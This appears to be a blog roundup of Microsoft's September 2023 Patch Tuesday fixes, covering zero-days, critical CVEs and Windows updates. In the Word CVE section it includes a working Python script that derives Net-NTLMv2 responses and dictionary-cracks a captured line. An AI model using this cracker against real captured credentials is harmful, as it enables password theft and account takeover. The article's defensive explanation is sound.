Microsoft releases a batch of security patches and updates for its products and services on the second Tuesday of every month. Keeping with that tradition, Microsoft addresses 66 CVEs in its September 2023 Patch Tuesday update. Five of the vulnerabilities fixed today are classified as Critical because they enable remote code execution or elevation of privilege. Microsoft rates the rest Important in severity; they include two zero-day vulnerabilities that were already being exploited in the wild.
Microsoft addresses 66 CVEs in its September 2023 Patch Tuesday update, including five rated Critical.
Microsoft Patch Tuesday for September 2023
In the September 2023 Patch Tuesday release, various products and components received updates to tackle vulnerabilities, including Microsoft Office, the .NET Framework, Azure services, and more. The updates address denial of service, elevation of privilege, remote code execution, and other flaw classes.
- 17 elevation of privilege (EoP) vulnerabilities, 1 of them Critical
- 24 remote code execution (RCE) vulnerabilities, 4 of them Critical
- 9 information disclosure vulnerabilities (all Important)
- 4 security feature bypass vulnerabilities (all Important)
- 3 denial of service vulnerabilities (all Important)
- 5 spoofing vulnerabilities, 4 of them Important
Here are some of the vulnerabilities that have been addressed in the September 2023 patch.
CVE-2023-36761: Microsoft Word Information Disclosure Vulnerability
CVE-2023-36761 is an information disclosure vulnerability in Microsoft Word, and one of the two zero-days in this release that was exploited before the patch shipped. Opening a specially crafted document, or merely displaying it in the Preview Pane, which Microsoft lists as an attack vector, can make Word authenticate to an attacker-controlled server with NTLM. What leaks is not the password but NTLM authentication material derived from it. The NT hash is the 16-byte MD4 digest of the password encoded as UTF-16LE, with no salt. In NTLM challenge-response the client never sends that hash directly: with NTLMv2 it keys an HMAC-MD5 over the server's challenge and a client blob; with the legacy NTLMv1 it pads the hash to 21 bytes, splits it into three 7-byte DES keys and encrypts the 8-byte challenge with each to produce a 24-byte response. Either way, a captured response can be cracked offline by trying candidate passwords, or relayed to another service that accepts NTLM, and because the NT hash is unsalted a recovered password also works everywhere it is reused. Beyond installing the update, block outbound SMB (TCP 445) at the network edge, require SMB signing, and restrict or audit NTLM use where possible.
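To make concrete what "NTLM hashes" means here, the following is an added example (not code from this page or from Microsoft) that reproduces the arithmetic an attacker runs after catching the outbound authentication: it computes the NT hash (MD4 over the UTF-16LE password), derives the NTLMv2 response from it, formats a capture the way hashcat mode 5600 expects, and recovers the password from that capture with a dictionary. The user name, domain, password, server challenge, blob contents and wordlist are all constructed for the example; MD4 is implemented inline because OpenSSL 3 no longer exposes it by default.

```python
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320, implemented here because OpenSSL 3 ships MD4 only in its
    optional legacy provider, so hashlib.new('md4') is not reliably available."""
    def F(x, y, z): return (x & y) | (~x & z)
    def G(x, y, z): return (x & y) | (x & z) | (y & z)
    def H(x, y, z): return x ^ y ^ z
    rounds = (
        (F, 0x00000000, tuple(range(16)), (3, 7, 11, 19)),
        (G, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    bit_len = len(data) * 8
    data += b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", bit_len)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(data), 64):
        X = struct.unpack("<16I", data[off:off + 64])
        a, b, c, d = state
        for fn, add, order, shifts in rounds:
            for i, j in enumerate(order):
                # Each step updates one register; rotating the names (a,b,c,d)->(d,a',b,c)
                # reproduces the RFC's fixed register pattern without writing out 48 lines.
                a, b, c, d = d, _rotl((a + fn(b, c, d) + X[j] + add) & MASK, shifts[i % 4]), b, c
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """The NT hash is MD4 over the UTF-16LE password; no salt, so it is directly crackable."""
    return md4(password.encode("utf-16le"))


def ntlmv2_hash(password: str, user: str, domain: str) -> bytes:
    """NTLMv2 key: HMAC-MD5 keyed with the NT hash over UPPER(user) || domain (UTF-16LE)."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()


def nt_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr: the 16-byte value a client sends to prove it knows the NT hash."""
    return hmac.new(ntlmv2_hash(password, user, domain), server_challenge + blob, hashlib.md5).digest()


def capture_line(user: str, domain: str, server_challenge: bytes, blob: bytes, proof: bytes) -> str:
    """Format a capture the way NTLM capture tools and hashcat mode 5600 do."""
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def crack_ntlmv2(line: str, wordlist):
    """Offline dictionary attack on a captured Net-NTLMv2 line; returns the password or None."""
    user, _, domain, chal_hex, proof_hex, blob_hex = line.split(":")
    server_challenge, proof, blob = bytes.fromhex(chal_hex), bytes.fromhex(proof_hex), bytes.fromhex(blob_hex)
    for candidate in wordlist:
        if hmac.compare_digest(nt_proof(candidate, user, domain, server_challenge, blob), proof):
            return candidate
    return None


# Constructed sample exchange (not a real capture): the victim opens the crafted document,
# Word authenticates to the attacker's listener, which logged the challenge and response.
VICTIM_PASSWORD = "Summer2023!"
SERVER_CHALLENGE = bytes.fromhex("1122334455667788")          # attacker-chosen 8-byte challenge
BLOB = (bytes.fromhex("0101000000000000")                       # NTLMv2 blob: version header
        + bytes.fromhex("00c0a3d1d8d8d901")                    # timestamp field (arbitrary filler)
        + bytes.fromhex("a1b2c3d4e5f60718")                    # client challenge
        + bytes(4))                                             # reserved; target info omitted here
CAPTURED = capture_line("jdoe", "CORP", SERVER_CHALLENGE, BLOB,
                        nt_proof(VICTIM_PASSWORD, "jdoe", "CORP", SERVER_CHALLENGE, BLOB))
WORDLIST = ["Password1", "Welcome1", "Summer2022!", "Summer2023!", "Autumn2023!"]

if __name__ == "__main__":
    print("NT hash of 'password':", nt_hash("password").hex())   # 8846f7eaee8fb117ad06bdd830b7586c
    print("captured:", CAPTURED)
    print("recovered password:", crack_ntlmv2(CAPTURED, WORDLIST))  # Summer2023!
```

Run it and the constructed capture cracks immediately; the point is that nothing about a Net-NTLMv2 line is secret once it leaves the host, so the defensive lever is to stop the outbound authentication (egress filtering of TCP 445, NTLM restrictions) rather than to rely on password complexity alone. There is no DES anywhere in this path, only MD4 and HMAC-MD5; DES appears only in the legacy NTLMv1 response.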
CVE-2023-36802: Microsoft Streaming Service Proxy Elevation of Privilege Vulnerability
CVE-2023-36802 is an elevation of privilege vulnerability in the Microsoft Streaming Service Proxy, a kernel-mode Windows component (the mskssrv.sys driver) rather than the Microsoft Stream cloud video service. It is the second of the two zero-days in this release that were exploited in the wild before the patch shipped.
An attacker who already has local code execution on the machine can use it to gain SYSTEM privileges, which makes it a natural second stage after any initial foothold, such as a phishing document. Patch it promptly and treat any pre-patch exploitation attempt as a sign that the host was already compromised.
Other Critical Severity Vulnerabilities Patched in September Patch Tuesday Edition:
- CVE-2023-38148 (Internet Connection Sharing RCE): an unauthenticated attacker can exploit the ICS service with a crafted network packet, but only when ICS is enabled and only from a system on the same network segment.
- CVE-2023-29332 (Azure Kubernetes Service EoP): a remotely exploitable flaw that requires no prior privileges and no user interaction and yields cluster administrator privileges.
- CVE-2023-36792, CVE-2023-36793, CVE-2023-36796 (Visual Studio RCE): each requires a victim to download and open a specially crafted file, which then leads to code execution on the victim's machine.
Recent updates from other companies
Third-party vendors such as Google, Apple, SAP, Cisco, Fortinet, and VMware have released updates since last month's Patch Tuesday. Vendors that released updates in September 2023 include:
- Apple fixed a zero-day exploit chain, dubbed BLASTPASS, that was used in attacks to install the Pegasus spyware.
- Atlas VPN: a zero-day in the Linux client can expose the user's real IP address.
- ASUS fixed three critical remote code execution bugs in the RT-AX55, RT-AX56U_V2, and RT-AC86U routers.
- Cisco released security updates for various products and warned of a zero-day in Cisco ASA devices.
- Google released the Android September 2023 and Chrome updates to fix actively exploited vulnerabilities.
- MSI released BIOS updates to fix ‘UNSUPPORTED_PROCESSOR’ errors in Windows.
- Notepad++ 8.5.7 was released to fix four security vulnerabilities.
- SAP has released its September 2023 Patch Day updates.
- VMware fixed a VMware Tools vulnerability.
Windows security updates
In addition to the security fixes, Microsoft has also published an update for the Windows Update service to improve its reliability and performance.
Microsoft fixes 16 vulnerabilities in Windows 11, 1 of them rated Critical and 15 Important.
- Internet Connection Sharing (ICS) Remote Code Execution Vulnerability — CVE-2023-38148
Windows 11 (version 22H2) – KB5030219 (OS Build 22621.2283). Manual download from Microsoft Update Catalog.
Installing cumulative update KB5030219 brings Windows 11 version 22H2 to build 22621.2283; it resolves various issues and introduces a few enhancements:
- Blank menu item from Sticky Keys menu removed (caused by KB5029351 update)
- Authentication issue with smart cards joining/rejoining Active Directory domain fixed
- New feature: Hover over search box gleam to see a search flyout box (adjustable in Taskbar settings)
- Support for daylight saving time changes in Israel
- Search app now opens properly after the machine wakes from sleep
- Improved reliability of the Search app
- TAB key now properly switches between search results
- Narrator correctly identifies search box on taskbar and the search highlights
- Search box size is fixed in tablet posture mode on Microsoft Surface Pro and Surface Book devices.
Users still running the original Windows 11 release (version 21H2) also get a new update today, KB5030217, but it contains only security fixes and no new features.
Windows 10 version 22H2 was affected by 16 vulnerabilities, 1 rated Critical and 15 Important.
- Internet Connection Sharing (ICS) Remote Code Execution Vulnerability — CVE-2023-38148
Windows 10 version 22H2 – KB5030211 (OS Build 19045.3448). Manual download from Microsoft Update Catalog. The same applies to Windows 10 version 21H2.
Windows 10 version 1809 – KB5030214 (OS Build 17763.4851). Manual download from Microsoft Update Catalog.
Note: versions 21H2 and 22H2 share a common base operating system and an identical set of system files, which is why they receive the same cumulative updates.
Installing cumulative update KB5030211 brings Windows 10 version 22H2 to build 19045.3448 and includes the following changes:
- New Windows Backup app for managing and recovering apps and files.
- Improved location detection for better weather, news, and traffic information in Windows 10.
- Start menu now supports notification badging for Microsoft accounts.
- Daylight saving time (DST) changes in Israel are now supported.
- Fixes for the search box.
- Group Policy Service now doesn’t wait for 30 seconds for the network to be available, ensuring correct policy processing.
- Issue with settings not syncing, even with the toggle on the Windows backup page in the Settings app, has been addressed.
You can read the complete changelog on the Microsoft support site here.
Windows 7 and Windows 8.1 have reached end of support, which means Microsoft no longer provides updates or security patches for these operating systems. For more information, see the Microsoft lifecycle page at https://learn.microsoft.com/en-us/lifecycle/end-of-support/end-of-support-2023
Download the Windows 10 update
All of these security updates are downloaded and installed automatically through Windows Update. You can also trigger the check manually: open Settings, go to Update & Security, and click Check for updates to install the September 2023 patches on your device immediately.
If you run into trouble installing these updates, check the Windows 10 update troubleshooting guide, which covers cumulative updates that get stuck downloading or fail to install with various error codes.
What time do Patch Tuesday patches come out?
- Microsoft releases its security updates on "Patch Tuesday," the second Tuesday of each month, at 10:00 AM Pacific Time.
Is Patch Tuesday weekly or monthly?
- Patch Tuesday falls on the second Tuesday of each month. The upcoming Patch Tuesday is on October 10, 2023.
Why is the second Tuesday of every month called Patch Tuesday?
- The second Tuesday of the month is called "Patch Tuesday" because Microsoft bundles its largest batch of updates into this predictable maintenance window.
What is the latest update for Windows 10 September 2023?
- The latest Windows 10 updates are KB5030211 for versions 22H2 and 21H2 and KB5030214 for version 1809.
What is the zero-day patch?
- A zero-day is a vulnerability that attackers are exploiting, or that is publicly known, before the vendor has a fix: the vendor has had "zero" days to develop a patch. A zero-day patch is the update that closes such a hole after the fact, which is why the two actively exploited bugs in this release deserve priority.